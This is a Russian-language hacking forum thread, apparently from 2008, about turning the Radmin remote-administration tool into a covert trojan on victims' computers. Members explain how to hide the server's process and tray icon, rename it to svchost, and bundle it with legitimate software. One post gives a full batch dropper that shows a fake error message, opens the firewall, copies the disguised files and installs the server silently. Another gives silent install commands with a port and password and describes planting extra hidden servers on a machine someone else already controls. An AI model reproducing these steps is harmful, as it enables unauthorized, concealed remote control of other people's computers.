Mega FAQ по Radmin'у

Discussion in 'Soft - Windows' started by Elekt, 29 Jan 2006.

  1. Fox1010

    Fox1010 New Member

    Joined:
    23 May 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    У меня то все остальные функции работаю, даже могу закрыть открытые программы через Telnet.
    версию не знаю, установил скрытую версию радмина из этого форума.
     
  2. T-Rey

    T-Rey Elder - Старейшина

    Joined:
    4 Jul 2007
    Messages:
    302
    Likes Received:
    218
    Reputations:
    18
    Хмм... Я устанавливал обычный 2.2 Потом ручками почистил инсталл, переименоавывал сервис, менял порт... Т.е. скрытой установкой не пользовался.

    Ну попробую её установить, может действительно косяк.
     
  3. Fox1010

    Fox1010 New Member

    Joined:
    23 May 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Попробуй. У меня версия со скрытой установкой, даже в процессах не плится, без иконок. Прога супер, вот если бы еще с ее помощью через Telnet можно было запустить прогу самому, тоесть установить, было бы вообще супер. Дело в том что при входе на удаленный комп с обычным радмином меня палят по иконке в трее. Закинуть свою версию возможно, а вот как потом ее запустить не знаю. ее нужно одним нажатием запустить, что я и пытаюсь через Телнет. И ничего не получается. Попробуй ты, может у тебя выйдет.
     
  4. T-Rey

    T-Rey Elder - Старейшина

    Joined:
    4 Jul 2007
    Messages:
    302
    Likes Received:
    218
    Reputations:
    18
    Так ты в реестре измени показ иконки в трее.
     
  5. Fox1010

    Fox1010 New Member

    Joined:
    23 May 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Зачем еще в реестр лазить, если у меня и так прога нигде не палится. Мне просто ее нужно самому на чужом компе активировать, т.е. запустить.
     
  6. T-Rey

    T-Rey Elder - Старейшина

    Joined:
    4 Jul 2007
    Messages:
    302
    Likes Received:
    218
    Reputations:
    18
    Проверял на windows 2003 (3SP) не работает.

    Как вариант попробуйте 3-ую версию, или собрать свой.
    Также альтернативой можно использовать руткид.
     
  7. immortal16

    immortal16 New Member

    Joined:
    23 Jul 2008
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    подскажите плиз нубу т.е. мне :
    я тут одним трояном заинтересовался(radmin 3.2) faq и все прилагающееся прочитал но понял меньше половины разъясните плиз:
    1. там два инсталера было один viewer второй server. так сервер у ся распаковывать или у жертвы.если у ся то жертве скидывать r_server.exe AdmDll.dll raddrv.dll правильно?2.как етот сервер настроить?
    3.пасс где найти смотрел в топиках так они все нерабочие мож есть программа какая (тада как ей пользоваться!
    4.объясните как инсталером объединить 2 программы чтоб жертва установила и софт(желаемый) и сервер ?
    5.как и куда скрипты прописывать чтоб у жертвы не логилась прога и чтоб из треи исчезла!?ах да и чтоб неспрашивала жертвы у разрешение на взлом?
     
  8. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    >2.как етот сервер настроить?
    конфиг. сохраняется в реестре...

    >3.пасс где найти смотрел в топиках так они все нерабочие мож есть программа какая >(тада как ей пользоваться!

    Вопрос не понял...

    >4.объясните как инсталером объединить 2 программы чтоб жертва установила и >софт(желаемый) и сервер ?

    Поищи джойнеры ...

    >5.как и куда скрипты прописывать чтоб у жертвы не логилась прога и чтоб из треи >исчезла!?ах да и чтоб неспрашивала жертвы у разрешение на взлом?

     
    1 person likes this.
  9. immortal16

    immortal16 New Member

    Joined:
    23 Jul 2008
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    так куда прописывать етот список ключей?
    как сделать так чтоб жертва устанавливала прогу и сервер за одно для версии 3.2?
     
    1 person likes this.
  10. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748

    Сохрани в *.reg и запускай ....
    либо Пуск -> Выполнить => regedit.exe
    там поэксперементируй ... хоть появится представление работы с реестром
     
  11. immortal16

    immortal16 New Member

    Joined:
    23 Jul 2008
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    regedit.exe это в компе жертвы запускать надо или на своем?
    а как запускать чениб на компе жертвы?чета слышал про телнет,мож пояснит кто как его настроить и т.д. и т.п.
    сор за бестактный вопрос :список ключей в реестре сохранить в reg? а как?где он?наверняка я оч назойлив но один раз рассказав что где жать и больше не пришлось бы!
     
  12. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Теперь и у меня вопрос... стоит ли переплетать свой пак радмина 2.1
    на более новый типа 3.2 ... меньше ли будет "палева"... (дружелюбны ли антивиры к этой версии?)
    да и накладок с конфигурацией не будет ли?....

    по сути же то же самое ... пара dll , 1-а exe шка...
    + прописать настройки в реестр.. ?
     
  13. .dimoN.

    .dimoN. Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    76
    Likes Received:
    56
    Reputations:
    5
    в 3 версии видеодрайвер работает как-то по другому. Пробовал собрать под новую версию, получилась только передача файлов
     
    3 people like this.
  14. metaN™®

    metaN™® Member

    Joined:
    7 Apr 2008
    Messages:
    0
    Likes Received:
    59
    Reputations:
    9
    Есть у кого нибуть крек или рабочий серийник для радмина 3.2?
     
  15. immortal16

    immortal16 New Member

    Joined:
    23 Jul 2008
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    что нужно прописать в телнете чтобы у жертвы в процессах не отображался r_server!?
    как заставить жертву запустить server без соц.инженирии?
     
  16. .dimoN.

    .dimoN. Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    76
    Likes Received:
    56
    Reputations:
    5
    причем тут telnet к радмину? если ты хочешь чтоб в процессах не было r_server просто переименуй его например в svchost
     
  17. immortal16

    immortal16 New Member

    Joined:
    23 Jul 2008
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    да я его даже настроить не могу ! скачал готовый пак тут же на форуме !он сам распаковывается в систем!проста в viewerе есть такая функция телнет я думал мож ей надо как то воспользоваться ?мож кто расскажет как такой архивчик создать и пасс свой поставить!пишите в личку плз!
    мож есть какие ниб другие способы проникнуть на комп (XP) кроме как троем?поделитесь!ну или хотя б че ниб предложите по сетевому хаку !
     
  18. immortal16

    immortal16 New Member

    Joined:
    23 Jul 2008
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    я так понял что нужно 4 файла : батник(111) такого сожержания в sfx архиве!:


    @echo off
    echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
    netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
    reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
    reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
    copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
    copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
    copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
    reg import 111.reg
    regedit /s 111.reg
    "%SYSTEMROOT%/svchost.exe" /install /silence
    "%SYSTEMROOT%/svchost.exe" /start

    а вот что в файле 111.reg?

    а исправьте чтоб етот архив после запуска сам и удаляся!расскажите что нужно сделать чтоб руткит вместе с radminом ставился может расскажете мне!
     
    #158 immortal16, 8 Aug 2008
    Last edited: 8 Aug 2008
  19. F3x111TsSL

    F3x111TsSL Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    39
    Likes Received:
    3
    Reputations:
    0
    у меня была трабла:
    у человека на порту 4899 стоял r_server
    я закинул ему еще два переименованых радмин сервера переименованых в svchost работающих на 4898 и 4897 портах
    настроил эти два через командную строку путем следующих команд:
    %SYSTEMROOT%/help\svchost.exe /install /silence
    %SYSTEMROOT%/help\svchost.exe /port:4898 /pass:tratata /save /silence
    %SYSTEMROOT%/help\svchost.exe /start
    и
    %SYSTEMROOT%/config\svchost.exe /install /silence
    %SYSTEMROOT%/config\svchost.exe /port:4897 /pass:tratata /save /silence
    %SYSTEMROOT%/config\svchost.exe /start


    в каждую директорию закидывал три файла:
    svchost.exe
    AdmDll.dll
    raddrv.dll

    собственно сама проблема с серверами на портах 4898 и 4897:
    через обмен файлов и телнет конектилось отлично но "управление" и "просмотр" не работали.
    после ввода пароля появлялась заставочка как при загрузке экрана и потом просто исчезала

    версия сервера 2.2 версия клиента 3.2

    при этом на 4899 портустоит такая точно 2.2 версия и она нормально работает

    как думаете в чем может быть проблема?

    з.ы. а сегодня сервера работать перестали ( видимо ктото спалил их нодом (








    содержание файла 111.reg
    факю по файлам бат и рег в первых двух постах этой темы



    чтобы файлы удалялись прописываешь в бат файле в конце:
    где xxx.xx название файла который надо удалить


    лично у меня бат файл был следующего содержания:
     
    #159 F3x111TsSL, 14 Aug 2008
    Last edited: 14 Aug 2008
  20. F3x111TsSL

    F3x111TsSL Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    39
    Likes Received:
    3
    Reputations:
    0
    попробуй так:
    в файлике 111.bat пипешь строку:
    xxx.xx
    где xxx.xx - имя файла который надо запустить. например install.exe
     
    #160 F3x111TsSL, 14 Aug 2008
    Last edited: 14 Aug 2008